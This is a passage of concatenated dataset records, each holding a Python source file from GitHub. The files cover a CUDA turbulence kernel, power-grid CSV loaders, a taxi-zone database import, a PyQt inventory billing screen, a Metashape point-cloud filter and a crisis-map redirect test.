nz])\n v_ = zeros([nx, ny, nz])\n w_ = zeros([nx, ny, nz])\n\n xc = dx / 2.0 + arange(0, nx) * dx\n yc = dy / 2.0 + arange(0, ny) * dy\n zc = dz / 2.0 + arange(0, nz) * dz\n\n # allocate memory on the device for u_, v_, w_ solutions\n # cuda_u = cuda.to_device(u_)\n # cuda_v = cuda.to_device(v_)\n # cuda_w = cuda.to_device(w_)\n\n # determine the threads per block and number of 
blocks\n threads_per_block = (8, 8, 8)\n bpg_x = int(math.ceil(u_.shape[0] / threads_per_block[0])) # blocks per grid in the x direction\n bpg_y = int(math.ceil(u_.shape[1] / threads_per_block[1]))\n bpg_z = int(math.ceil(u_.shape[2] / threads_per_block[2]))\n blocks_per_grid = (bpg_x, bpg_y, bpg_z)\n\n # run the kernel\n turbo_kernel[blocks_per_grid, threads_per_block](kx, ky, kz, xc, yc, zc, psi, um, sxm, sym, szm, dx, dy,\n dz, u_, v_, w_)\n return u_, v_, w_\n","repo_name":"saadgroup/TurboGenPY","sub_path":"cudaturbo.py","file_name":"cudaturbo.py","file_ext":"py","file_size_in_byte":5801,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"32455168304","text":"import pandas as pd\nfrom Safe_Cascade.classes.power import *\nfrom Safe_Cascade.util.class_function import update_dataclass\n\ndef get_bus(bus_list: List, bus_num: int):\n _bus_dict = {_.bus_num:_ for _ in bus_list}\n return _bus_dict[bus_num]\n\ndef get_sub(sub_list: List, sub_name: int):\n _sub_dict = {_.name:_ for _ in sub_list}\n return _sub_dict[sub_name]\n\ndef get_substations(url):\n substations_df = pd.read_csv(url)\n substations = substations_df.apply(lambda x: SubStation(name=x['SubName'],\n location=Point(x['Longitude'], x['Latitude']),\n subid=x['SubID']), axis=1).to_list()\n return substations\n\n\ndef get_buses(url):\n buses_df = pd.read_csv(url)\n buses = buses_df.apply(lambda x: Bus(name=x['BusName'],\n bus_num=x['BusNum'],\n voltage=x['BusNomVolt'],\n substation=x['BusName'][:-len(str(x['BusNomVolt']))]), axis=1).to_list()\n\n return buses\n\n\ndef get_transformers(url, buses_list):\n transformers_df = pd.read_csv(url)\n transformers = transformers_df.apply(lambda row: Transformer(\n name=\"{}-{}-txfmr\".format(row['BusNum'], row['BusNum:1']),\n bus1name=get_bus(buses_list, row['BusNum']).name,\n bus2name=get_bus(buses_list, row['BusNum:1']).name,\n substation=get_bus(buses_list, row['BusNum:1']).substation,\n r=row['LineR:1'],\n x=row['LineX:1'],\n s_nom=row['XFMVABase']), axis=1).to_list()\n return transformers\n\n\ndef update_names(data_list):\n #transformers and transmission lines need this step\n transformers_name = {}\n for _ in data_list:\n _name = _.name\n if _name in transformers_name:\n transformers_name[_name] = transformers_name[_name] + 1\n else:\n transformers_name[_name] = 1\n update_dataclass(_, name=f'{_name}-{transformers_name[_name]}')\n\n\ndef get_transmissionlines(url, buses, substations):\n lines_df = pd.read_csv(url)\n lines = lines_df.apply(lambda row: Line(name=\"Line-{}-{}\".format(row['BusNum'], row['BusNum:1']),\n bus1name=get_bus(buses, row['BusNum']).name,\n bus2name=get_bus(buses, row['BusNum:1']).name,\n sub_1=get_sub(substations, get_bus(buses, row['BusNum']).substation).name,\n sub_2=get_sub(substations, get_bus(buses, row['BusNum:1']).substation).name,\n r=row['LineR'],\n x=row['LineX'],\n mva_limit=row['LineAMVA'],\n voltage=get_bus(buses, row['BusNum']).voltage,\n location=LineString([get_sub(substations, get_bus(buses, row[\n 'BusNum']).substation).location,\n get_sub(substations, get_bus(buses, row[\n 'BusNum:1']).substation).location])),\n axis=1).to_list()\n return lines\n\n\ndef get_generators(url, buses):\n gen_df = pd.read_csv(url)\n generators = gen_df.apply(lambda x: Generator(name=f\"{str(x['BusNum'])}-{str(x['GenID'])}\",\n bus_num=x['BusNum'],\n bus_name=get_bus(buses, x['BusNum']).name,\n gen_id=x['GenID'],\n v_pu=x['GenVoltSet'],\n p_set=x['GenMWSetPoint'],\n status=x['GenStatus']), axis=1).to_list()\n 
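# apply(..., axis=1) builds one Generator per DataFrame row; .to_list()\n    # converts the resulting pandas Series into a plain Python list\n    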
return generators\n\n\ndef get_loads(url, buses):\n loads_df = pd.read_csv(url)\n loads = loads_df.apply(lambda x: Load(name=\"{}-Load\".format(x['BusNum']),\n p=x['LoadSMW'],\n q=x['LoadSMVR'],\n substation=get_bus(buses, x['BusNum']).substation,\n bus_name=get_bus(buses, x['BusNum']).name), axis=1).to_list()\n return loads\n\n\n\n","repo_name":"ruilee16/safe_cascade","sub_path":"Safe_Cascade/util/get_power_components.py","file_name":"get_power_components.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24840983428","text":"## import taxi zone info to database, source : https://s3.amazonaws.com/nyc-tlc/misc/taxi+_zone_lookup.csv\n\nimport csv\nimport psycopg2\nfrom psycopg2 import Error\n\nimport datetime\nfrom datetime import datetime\n\n\nconn = psycopg2.connect(host=\"10.0.0.10\",database=\"db_psql_taxi\", user=\"jelov\", password=\"jelov_psql_pwd\")\n\ncur = conn.cursor()\n\ncur.execute(\"CREATE TABLE taxiZoneInfo (ZoneId integer PRIMARY KEY, Borough text, Zone_Name text, service_zone text);\") #only create once\n\nwith open('taxi_zone_lookup.csv','r') as f:\n reader=csv.reader(f)\n next(reader)\n for row in reader:\n cur.execute(\n \"INSERT INTO taxiZoneInfo VALUES (%s, %s, %s, %s)\",\n row\n )\n print(row)\n\ncur.execute(\"SELECT * FROM taxiZoneInfo;\")\ncur.fetchone()\n\nconn.commit()\ncur.close()\nconn.close()\n\n","repo_name":"JelovXCMS/TaxiForNextRide","sub_path":"miscellaneous/addZoneInfo.py","file_name":"addZoneInfo.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15193618532","text":"# we have f(i) = A[i] >= i. It is False, False, False, then it starts to be always True,\n# this is the definition of dichotomie\n\ndef magic_index(a):\n def f(x):\n return a[x] >= x\n i = 0\n j = len(a) - 1\n while j-i != 0:\n h = (j+i) >> 1\n if f(h):\n # we know magic index is between i and h (included)\n j = h\n else:\n # we know magic index is between h+1 and j\n i = h+1\n if a[j] == j:\n return j\n return None\n","repo_name":"piochelepiotr/crackingTheCode","sub_path":"chp8/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2700502646","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom dao import Connections\nfrom utilities import *\nimport datetime\nfrom screens import LoginScreen\nimport sys\n\nclass BillScreen(QWidget):\n def __init__(self,uname=None):\n super().__init__()\n self.username = uname\n print(self.username)\n\n self.PrepareScreen()\n\n def PrepareScreen(self):\n self.ptotal = 0\n self.itemnum = 0\n self.ProductList=list()\n self.brand_records=list()\n self.cat_records = list()\n self.subcat_records = list()\n self.item_records = list()\n self.cust_records=list()\n grid=QGridLayout()\n self.setGeometry(50,50,1500,1000)\n self.setWindowTitle(\"Bill Screen\")\n newfont = QFont(\"Bell MT\", 18, QFont.Bold)\n self.rboldcust=QRadioButton(\"Old Customer\")\n self.rbnewcust = QRadioButton(\"New Customer\")\n\n lblcust=QLabel(\"New Customer Details\")\n lblcustname=QLabel(\"Customer Name\")\n lblcontact=QLabel(\"Contact No.\")\n lblemail=QLabel(\"Email Id\")\n lbladd=QLabel(\"Address\")\n lblbid=QLabel(\"Choose BrandID\")\n lblcid = QLabel(\"Choose CatID\")\n lblid = QLabel(\"Choose ItemID\")\n lblcustid=QLabel(\"Choose 
CustomerID\")\n lblsubid=QLabel(\"Choose SubCat ID\")\n lblitemno=QLabel(\"Items\")\n lbltotal=QLabel(\"Pay\")\n lbloldcontact=QLabel(\"Contact\")\n lblpaid=QLabel(\"Amount Paid\")\n\n\n lblcust.setFont(newfont)\n lblcustname.setFont(newfont)\n lblcontact.setFont(newfont)\n lbloldcontact.setFont(newfont)\n lblemail.setFont(newfont)\n lbladd.setFont(newfont)\n lblcid.setFont(newfont)\n lblbid.setFont(newfont)\n lblid.setFont(newfont)\n lblpaid.setFont(newfont)\n lblcustid.setFont(newfont)\n lblsubid.setFont(newfont)\n lblitemno.setFont(newfont)\n lbltotal.setFont(newfont)\n self.rboldcust.setFont(newfont)\n self.rbnewcust.setFont(newfont)\n\n lblamount=QLabel(\"Amount\")\n self.amount=QLineEdit()\n self.paidEdit=QLineEdit()\n self.itemno=QLabel()\n self.total=QLabel()\n self.oldcontactEdit=QLineEdit()\n self.total.setStyleSheet(\"color:red\")\n self.itemno.setStyleSheet(\"color:BLUE\")\n lblamount.setFont(newfont)\n self.amount.setFont(newfont)\n\n self.custnameEdit=QLineEdit()\n self.contactEdit=QLineEdit()\n self.paidEdit.setFont(newfont)\n self.emailEdit=QLineEdit()\n self.addEdit=QLineEdit()\n self.custidcombo=QComboBox()\n self.brandidcombo=QComboBox()\n self.catidcombo=QComboBox()\n self.subcatidcombo=QComboBox()\n self.itemidcombo=QComboBox()\n self.tableWidget=QTableWidget()\n\n lblqty = QLabel(\"Qty\")\n self.qtyEdit = QLineEdit()\n self.qtyEdit.setToolTip(\"enter qty\")\n self.btn = QPushButton(\"ADD Product\")\n self.btngenerate=QPushButton(\"Generate Bill\")\n lblqty.setFont(newfont)\n self.qtyEdit.setFont(newfont)\n self.addEdit.setFont(newfont)\n self.paidEdit.setFont(newfont)\n self.custnameEdit.setFont(newfont)\n self.contactEdit.setFont(newfont)\n self.emailEdit.setFont(newfont)\n self.custidcombo.setFont(newfont)\n self.brandidcombo.setFont(newfont)\n self.catidcombo.setFont(newfont)\n self.itemidcombo.setFont(newfont)\n self.subcatidcombo.setFont(newfont)\n self.btn.setFont(newfont)\n self.btngenerate.setFont(newfont)\n self.total.setFont(newfont)\n self.itemno.setFont(newfont)\n self.oldcontactEdit.setFont(newfont)\n\n #For making all the widgets inactive initially\n self.custnameEdit.setEnabled(False)\n self.contactEdit.setEnabled(False)\n self.emailEdit.setEnabled(False)\n self.addEdit.setEnabled(False)\n self.custidcombo.setEnabled(False)\n\n\n #Positioning of widgets\n grid.addWidget(self.rboldcust,1,0,1,2)\n grid.addWidget(self.rbnewcust, 1,4,1,2)\n\n grid.addWidget(lblcustid,2,0,1,2)\n grid.addWidget(self.custidcombo,2,2,1,2)\n\n grid.addWidget(lbloldcontact, 3, 0, 1, 2)\n grid.addWidget(self.oldcontactEdit, 3, 2, 1, 2)\n\n grid.addWidget(lblcust,2,4,1,2)\n grid.addWidget(lblcustname,3,4,1,2)\n\n grid.addWidget(self.custnameEdit,3,6,1,2)\n grid.addWidget(lblcontact,4,4,1,2)\n grid.addWidget(self.contactEdit,4,6,1,2)\n grid.addWidget(lblemail,5,4,1,1)\n grid.addWidget(self.emailEdit,5,6,1,2)\n\n\n grid.addWidget(lbladd,6,4,1,1)\n grid.addWidget(self.addEdit,6,6,1,2)\n grid.addWidget(lblbid,7,0,1,2)\n grid.addWidget(self.brandidcombo,7,2,1,2)\n grid.addWidget(lblsubid, 7, 4, 1, 2)\n grid.addWidget(self.subcatidcombo, 7, 6, 1, 2)\n grid.addWidget(lblcid, 8, 0,1,2)\n grid.addWidget(self.catidcombo, 8, 2,1,2)\n\n grid.addWidget(lblid, 8,4,1,2 )\n grid.addWidget(self.itemidcombo, 8, 6,1,2)\n grid.addWidget(lblpaid, 8, 8, 1, 1)\n grid.addWidget(self.paidEdit, 8, 9, 1, 2)\n grid.addWidget(lblqty,9,0,1,2)\n grid.addWidget(self.qtyEdit,9,2,1,2)\n grid.addWidget(lblitemno, 9, 4, 1, 1)\n grid.addWidget(self.itemno, 9, 5, 1, 1)\n grid.addWidget(lbltotal, 9, 6, 1, 1)\n 
grid.addWidget(self.total, 9, 7, 1, 1)\n grid.addWidget(self.btn, 9, 8, 1, 1)\n grid.addWidget(self.btngenerate, 9, 9, 1, 2)\n\n grid.addWidget(self.tableWidget,10,0,1,15)\n self.custidcombo.addItem(\"Choose CustomerID\")\n self.brandidcombo.addItem(\"BrandID\")\n self.catidcombo.addItem(\"CategoryID\")\n self.ComboFunc()\n # To make one of of the radiobutton actions active at a time\n self.rboldcust.toggled.connect(self.OldCustomer)\n self.rbnewcust.toggled.connect(self.NewCustomer)\n self.btn.clicked.connect(self.AddProduct)\n self.tableWidget.setContextMenuPolicy(Qt.ActionsContextMenu)\n deleteAction = QAction(\"Delete Record\", self.tableWidget)\n\n self.tableWidget.addAction(deleteAction)\n\n\n\n deleteAction.triggered.connect(self.DeleteRecord)\n\n self.btngenerate.clicked.connect(self.GenerateBill)\n\n self.setLayout(grid)\n\n #self.show()\n def OldCustomer(self,enabled):\n try:\n self.custidcombo.setEnabled(enabled)\n self.PrepareCustcombo()\n self.custidcombo.currentTextChanged.connect(self.ChangeCombo)\n self.catidcombo.currentIndexChanged.connect(self.CatChange)\n self.subcatidcombo.currentIndexChanged.connect(self.SubCatChange)\n except BaseException as ex:\n print(ex)\n\n def ChangeCombo(self):\n try:\n index = self.custidcombo.currentIndex()\n if index > 0 and (index - 1) <= len(self.cust_records):\n\n record = self.cust_records[index - 1]\n\n self.oldcontactEdit.setText(record[2])\n else:\n self.oldcontactEdit.setText(\"\")\n except BaseException as ex:\n print(ex)\n\n def NewCustomer(self, enabled):\n try:\n\n self.custnameEdit.setEnabled(enabled)\n self.contactEdit.setEnabled(enabled)\n self.emailEdit.setEnabled(enabled)\n self.addEdit.setEnabled(enabled)\n\n self.catidcombo.currentIndexChanged.connect(self.CatChange)\n self.subcatidcombo.currentIndexChanged.connect(self.SubCatChange)\n\n\n except BaseException as ex:\n print(ex)\n\n\n\n\n def CatChange(self, index):\n try:\n\n self.subcatidcombo.clear()\n\n self.subcatidcombo.addItem(\"SubCatID\")\n\n value=self.cat_records[index-1]\n\n\n con = Connections.Connection()\n\n query = \"select SubcategoryId,SubCategoryName from subcategoryinfo where CategoryId=\"+str(value[0])\n\n self.subcat_records = con.ExecuteQuery(query)\n\n for record in self.subcat_records:\n value = record[1] + \"(\" + str(record[0]) + \")\"\n self.subcatidcombo.addItem(value)\n except BaseException as ex:\n print(ex)\n\n\n def SubCatChange(self, index):\n try:\n self.itemidcombo.clear()\n self.itemidcombo.addItem(\"ItemID\")\n value=self.subcat_records[index-1]\n subcat=value[0]\n\n con = Connections.Connection()\n\n query = \"select ItemId,ItemName,Price,AvailableQty from iteminfo where SubCategoryId=\" + str(value[0])\n\n self.item_records = con.ExecuteQuery(query)\n\n for record in self.item_records:\n value = record[1] + \"(\" + str(record[0]) + \")\"\n self.itemidcombo.addItem(value)\n except BaseException as ex:\n print(ex)\n\n def PrepareCombo(self):\n con=Connections.Connection()\n table_name=\"brandinfo\"\n column_values=(\"BrandId\",\"BrandName\")\n query=con.CreateSelectQuery(column_values,table_name)\n #print(query)\n self.brand_records=con.ExecuteQuery(query)\n\n for record in self.brand_records:\n value=record[1]+\"(\"+str(record[0])+\")\"\n self.brandidcombo.addItem(value)\n\n\n table_name = \"categoryinfo\"\n column_values = (\"CategoryId\", \"CategoryName\")\n query = con.CreateSelectQuery(column_values, table_name)\n #print(query)\n self.cat_records = con.ExecuteQuery(query)\n #print(self.cat_records)\n for record in 
self.cat_records:\n value = record[1] + \"(\" + str(record[0]) + \")\"\n self.catidcombo.addItem(value)\n\n def PrepareCustcombo(self):\n con=Connections.Connection()\n table_name=\"customerinfo\"\n column_values=(\"CustomerId\",\"CustomerName,contact\")\n query=con.CreateSelectQuery(column_values,table_name)\n self.cust_records=con.ExecuteQuery(query)\n if self.cust_records is not None:\n for record in self.cust_records:\n value=str(record[1])+\" (\"+ str(record[0])+\")\"\n self.custidcombo.addItem(value)\n\n def AddProduct(self):\n try:\n message=\"\"\n\n bid=self.brandidcombo.currentIndex()\n\n record=self.brand_records[bid-1]\n brand=record[1]\n\n\n\n cid = self.catidcombo.currentIndex()\n record = self.cat_records[cid - 1]\n category = record[1]\n\n subcatid = self.subcatidcombo.currentIndex()\n record = self.subcat_records[subcatid - 1]\n subcat = record[1]\n\n itemid = self.itemidcombo.currentIndex()\n\n record = self.item_records[itemid - 1]\n itemId=record[0]\n item = record[1]\n\n price = int(record[2])\n qty = self.qtyEdit.text()\n qt = 0\n\n if self.ProductList is not None:\n for record in self.ProductList:\n if record[7] == itemId:\n qt += int(record[4])\n\n\n Qty=int(qty) + qt\n\n if itemId is not None:\n con=Connections.Connection()\n query=\"select AvailableQty from iteminfo where itemid = \"+str(itemId)\n\n self.itemqty=con.ExecuteQuery(query)\n\n if self.itemqty[0][0]>= Qty:\n self.diff=self.itemqty[0][0]-Qty\n\n if IsEmpty(brand):\n message+=\"Select Brand\\n\\n\"\n\n if IsEmpty(category):\n message+=\"Select Category\\n\\n\"\n\n if IsEmpty(subcat):\n message+=\"Select SubCategory\\n\\n\"\n\n if IsEmpty(item):\n message+=\"Select Item\\n\\n\"\n if IsEmpty(qty):\n message += \"Enter Quantity\\n\\n\"\n elif not IsFloat(qty) or not IsNumber(qty):\n message += \"Enter Quantity In digits\\n\\n\"\n\n subtotal=price*int(qty)\n\n #It will send all the values of a particular item to product List\n self.value=(item,brand,category,subcat,qty,price,subtotal,itemId)\n\n self.ProductList.append(self.value)\n self.ptotal+=int(subtotal)\n self.itemnum+=int(qty)\n\n\n self.itemno.setText(str(self.itemnum))\n self.total.setText(str(self.ptotal))\n\n\n self.PrepareTable()\n message=\"Item Added\"\n\n else:\n self.diff=Qty-self.itemqty[0][0]\n message=\"Demand is Out of Range\\n\\nShortage= \"+ str(self.diff)\n else:\n message=\"Select Item\"\n ShowMessageDialog(self,message)\n except BaseException as ex:\n print(ex)\n def PrepareTable(self):\n column_values=(\"ItemName\",\"BrandName\",\"CategoryName\",\"SubcategoryName\",\"Qty\",\"Price\",\"Sub-Total\")\n self.tableWidget.setColumnCount(7)\n self.tableWidget.setHorizontalHeaderLabels(column_values)\n row=0\n if len(self.ProductList)>0:\n self.tableWidget.setRowCount(len(self.ProductList))\n for record in self.ProductList:\n self.tableWidget.setItem(row,0,QTableWidgetItem(record[0]))\n self.tableWidget.setItem(row, 1, QTableWidgetItem(record[1]))\n self.tableWidget.setItem(row, 2, QTableWidgetItem(record[2]))\n self.tableWidget.setItem(row, 3, QTableWidgetItem(record[3]))\n self.tableWidget.setItem(row, 4, QTableWidgetItem(str(record[4])))\n self.tableWidget.setItem(row, 5, QTableWidgetItem(str(record[5])))\n self.tableWidget.setItem(row, 6, QTableWidgetItem(str(record[6])))\n\n row+=1\n\n\n def ComboFunc(self):\n self.PrepareCombo()\n\n\n def DeleteRecord(self):\n try:\n message = \"\"\n srow = self.tableWidget.currentRow()\n bid = self.tableWidget.item(srow, 0).text()\n qty = self.tableWidget.item(srow, 4).text()\n price = 
self.tableWidget.item(srow, 5).text()\n            del(self.ProductList[srow])\n            self.tableWidget.removeRow(self.tableWidget.currentRow())\n            self.itemnum-=int(qty)\n            self.ptotal-=float(price)\n            self.itemno.setText(str(self.itemnum))\n            self.total.setText(str(self.ptotal))\n        except BaseException as ex:\n            print(ex)\n\n    def GenerateBill(self):\n        #print(\"cash\")\n        try:\n\n\n            if self.rboldcust.isChecked():\n                message=\" \"\n                con=Connections.Connection()\n                custid=self.custidcombo.currentIndex()\n                cust_record=self.cust_records[custid-1]\n                customerid=cust_record[0]\n                Date = datetime.datetime.now()\n                EntryDate = Date.date()\n                pay=\"cash\"\n\n                table_bname='billinfo'\n                column_bvalues={\"CustomerId\":str(custid),\"BillDate\":str(EntryDate),\"UserName\":str(self.username),\"PaymentDescription\":str(pay)}\n                query=con.CreateInsertQuery(table_bname,column_bvalues)\n                print(query)\n                if con.InsertQuery(query):\n                    query='select last_insert_id()'\n                    billid=con.ExecuteQuery(query)\n\n                    for products in self.ProductList:\n                        table_billdetail = \"billdetails\"\n                        column_bdetailvalues = {\"BillId\": str(billid[0][0]), \"ItemId\":str(products[7]),\"Qty\":str(products[4]),\"Price\":str(products[5])}\n                        query=con.CreateInsertQuery(table_billdetail,column_bdetailvalues)\n                        if con.InsertQuery(query):\n                            query=\"update iteminfo set AvailableQty=\"+ str(self.diff)\n                            query+=\" where ItemId= \"+str(products[7])\n\n\n                            if con.InsertQuery(query):\n                                message = \"Bill generated successfully\"\n                                ShowMessageDialog(self,message)\n\n                                self.Dialog()\n\n                else:\n                    message=\"Failure Due To: \"+ con.GetErrorMessage()\n\n\n            elif self.rbnewcust.isChecked():\n                try:\n                    message=\"\"\n                    allvalid=True\n                    cname=self.custnameEdit.text()\n                    contact=self.contactEdit.text()\n                    email=self.emailEdit.text()\n                    add=self.addEdit.text()\n                    if IsEmpty(cname) or IsEmpty(contact) or IsEmpty(add):\n                        message=\"Enter all fields(name,contact,address)\\n\\n\"\n                        allvalid=False\n                    if IsEmpty(self.paidEdit.text()):\n                        message=\"Enter amount to be paid\"\n                        allvalid=False\n                    if not IsAlphabet(cname):\n                        message+=\"Enter valid Name\\n\\n\"\n                        allvalid=False\n                    if not ValidContact(contact):\n                        message+=\"Enter a valid contact\\n\\n\"\n                        allvalid=False\n\n                    if len(self.ProductList)<=0:\n                        message+=\"Select the items to be purchased\\n\\n\"\n                        allvalid=False\n\n                    if allvalid==True:\n                        con=Connections.Connection()\n                        table_name=\"customerinfo\"\n                        column_values={\"CustomerName\":cname,\"contact\":str(contact),\"EmailId\":str(email),\"Address\":add}\n                        query=con.CreateInsertQuery(table_name,column_values)\n\n                        if con.InsertQuery(query):\n\n                            query='select last_insert_id()'\n                            self.custId=con.ExecuteQuery(query)\n                            uname=self.username\n                            pay=\"cash\"\n                            Date = datetime.datetime.now()\n                            EntryDate = Date.date()\n                            table_bname = 'billinfo'\n                            column_bvalues = {\"CustomerId\": str(self.custId[0][0]), \"BillDate\": str(EntryDate), \"UserName\": uname,\n                                              \"PaymentDescription\": pay}\n                            query = con.CreateInsertQuery(table_bname, column_bvalues)\n                            if con.InsertQuery(query):\n                                query = 'select last_insert_id()'\n                                billid = con.ExecuteQuery(query)\n                                print(billid)\n                                print(self.ProductList)\n\n                                for products in self.ProductList:\n                                    table_billdetail = \"billdetails\"\n                                    column_bdetailvalues = {\"BillId\": str(billid[0][0]), \"ItemId\": str(products[7]),\n                                                            \"Qty\": str(products[4]), \"Price\": str(products[5])}\n                                    query = con.CreateInsertQuery(table_billdetail, column_bdetailvalues)\n                                    print(query)\n                                    if con.InsertQuery(query):\n                                        query = \"update iteminfo set AvailableQty=\" + str(self.diff)\n                                        query += \" where ItemId= \" + str(products[7])\n                                        
con.InsertQuery(query)\n                                        message=\"Bill generated successfully\"\n                            else:\n                                message = \"Failure Due To: \" + con.GetErrorMessage()\n                        else:\n                            message=\"Failure due to: \"+ con.GetErrorMessage()\n\n\n                except BaseException as ex:\n                    print(ex)\n                ShowMessageDialog(self,message)\n\n                self.Dialog()\n\n\n        except BaseException as ex:\n            print(ex)\n\n    def Dialog(self):\n        try:\n\n\n\n            #self.setStyleSheet(\"Font-Family:Bell MT;Font-Size:25px;Font-weight: Bold\")\n            paid = self.paidEdit.text()\n            amt = self.ptotal\n            bal = float(paid) - amt\n\n            balance = \"Balance : \" + str(bal)\n\n            ShowMessageDialog(self,balance)\n\n        except BaseException as ex:\n            print(ex)","repo_name":"akshitagarg15/IMS_GUI","sub_path":"inventory_data/screens/BillScreen.py","file_name":"BillScreen.py","file_ext":"py","file_size_in_byte":20515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14428838016","text":"def get_sum(num_one, num_two):\n    try:\n        sum_number = int(num_one) + int(num_two)\n        print(sum_number)\n    except ValueError:\n        print('Kek. Enter a different data type')\n\n\nget_sum(3, 5)\n\n\n\n\n\n\n\n","repo_name":"Vlad-Bryu/Home_work","sub_path":"after_1_lesson/exception2task.py","file_name":"exception2task.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13359802591","text":"with open(\"aoc6.txt\", 'r', encoding=\"utf8\") as f:\n    data = f.read()\n\ny = data.split(\"\\n\\n\") #split data into groups - still have \\n inside\ncount_uniq = 0\nfinal_count = 0\n\n# Part 1:\n# for x in y: # loop through groups\n#     uniq_list = []\n#     z = x.split(\"\\n\") #split each group into mini list\n#\n#     all = (''.join(map(str, z))) #combine list items together\n#\n#     for a in range(0,len(all)):\n#         if all[a] not in uniq_list:\n#             uniq_list.append(all[a])\n#\n#     count_uniq = len(uniq_list)\n#     final_count += count_uniq\n#     uniq_list = []\n#\n# print(final_count)\n\n# Part 2:\nfor x in y: # loop through groups\n    uniq_list = []\n    z = x.split(\"\\n\") #split each group into mini list\n    mydict = {}\n    count_uniq = 0\n    group_size = len(z)\n\n    for a in z:\n        for b in range(0,len(a)):\n            if a[b] in mydict:\n                mydict[a[b]] += 1\n            else:\n                mydict[a[b]] = 1\n\n    for key, value in mydict.items():\n        if value == group_size:\n            count_uniq += 1\n\n    final_count += count_uniq\n\nprint(final_count)","repo_name":"adambatchelor2/python","sub_path":"adventofCode_day6.py","file_name":"adventofCode_day6.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22886426735","text":"## Two Sum\n# Given an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\nfrom typing import List\n\n\nclass Solution:\n    def twoSum(self, nums: List[int], target: int) -> List[int]:\n        numsDict = dict()\n        for index, element in enumerate(nums):\n            if f\"{element}\" in numsDict:\n                numsDict[f\"{element}\"].append(index)\n            else:\n                numsDict[f\"{element}\"] = [index]\n        \n        for index, element in enumerate(nums):\n            diff = f\"{(target - element)}\"\n            if diff in numsDict:\n                if target - element == element:\n                    if len(numsDict[diff]) > 1:\n                        return [\n                            numsDict[f\"{element}\"][0],\n                            numsDict[f\"{element}\"][1]\n                        ]\n                else:\n                    return [\n                        numsDict[f\"{target - element}\"][0], \n                        numsDict[f\"{element}\"][0]\n                    
]","repo_name":"henriqueconte/Challenges","sub_path":"LeetCode/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22102243411","text":"import Metashape\nimport sys\n\n\"\"\"\nMetashape Point Cloud Filter by Confidence (v 0.1)\nJules Fleury, SIGéo/CEREGE/AMU\nUsage:\nTools -> Run script\nIn the row \"Arguments\" enter the maximum confidence level to cut\nex: 3\nThe script will then select and remove all points in the confidence level [0,3]\nor leave the \"Arguments\" line blank, in which case the default value will be used.\n\"\"\"\n\ndef_maxconf = 3\n\nif len(sys.argv) == 2:\n\tmaxconf = int(sys.argv[1])\n\tprint(\"Using max confidence value from user argument \" + str(maxconf) + \"\\n\")\nelse:\n\tmaxconf = def_maxconf\n\tprint(\"Using max confidence value from default value \" + str(maxconf) + \"\\n\")\n\n\ndef filter_point_cloud(chunk, maxconf):\n\tchunk.point_cloud.setConfidenceFilter(0, maxconf) # configuring point cloud filter so that only point with low-confidence currently active\n\tall_points_classes = list(range(128))\n\tchunk.point_cloud.removePoints(all_points_classes) # removes all active points of the point cloud, i.e. removing all low-confidence points\n\tchunk.point_cloud.resetFilters() # resetting filter, so that all other points (i.e. high-confidence points) are now active\n\n\nfor chunk in Metashape.app.document.chunks:\n\tprint(\"Processing chunk \" + chunk.label + \"...\")\n\tfilter_point_cloud(chunk, maxconf)\n","repo_name":"agisoft-llc/metashape-scripts","sub_path":"src/contrib/filter_point_cloud_confidence.py","file_name":"filter_point_cloud_confidence.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":292,"dataset":"github-code","pt":"37"} +{"seq_id":"21672752530","text":"__author__ = 'kpy@google.com (Ka-Ping Yee)'\n\nimport webapp2\nimport webob\n\nimport config\nimport domains\nimport test_utils\n\n\nclass IndexTest(test_utils.BaseTest):\n \"\"\"Tests for the Index request handler.\"\"\"\n\n def testRedirectWithCrisisParam(self):\n \"\"\"Tests GetDestination with old-style id= and crisis= parameters.\"\"\"\n self.assertEquals(\n 'http://app.com/root/abc?layers=def',\n self.DoGet('/?id=abc&layers=def', 302).headers['Location'])\n self.assertEquals(\n 'http://app.com/root/abc?layers=def',\n self.DoGet('/?crisis=abc&layers=def', 302).headers['Location'])\n\n def testRedirectDefault(self):\n \"\"\"Tests GetDestination with no label parameter.\"\"\"\n self.assertEquals('http://app.com/root/empty',\n self.DoGet('', 302).headers['Location'])\n\n self.assertEquals('http://app.com/root/empty?layers=x',\n self.DoGet('/?layers=x', 302).headers['Location'])\n\n with test_utils.RootLogin():\n domains.Domain.Put('xyz.com', default_label='qwerty')\n self.assertEquals('http://app.com/root/qwerty?layers=x',\n self.DoGet('/?layers=x', 302).headers['Location'])\n\n with test_utils.RootLogin():\n domains.Domain.Put('foo.org', default_label='fancy-label')\n response = self.DoGet('/foo.org/?layers=x', 302)\n self.assertEquals('http://app.com/root/foo.org/fancy-label?layers=x',\n response.headers['Location'])\n\n\nif __name__ == '__main__':\n test_utils.main()\n","repo_name":"googlearchive/googlecrisismap","sub_path":"index_test.py","file_name":"index_test.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"37"} 
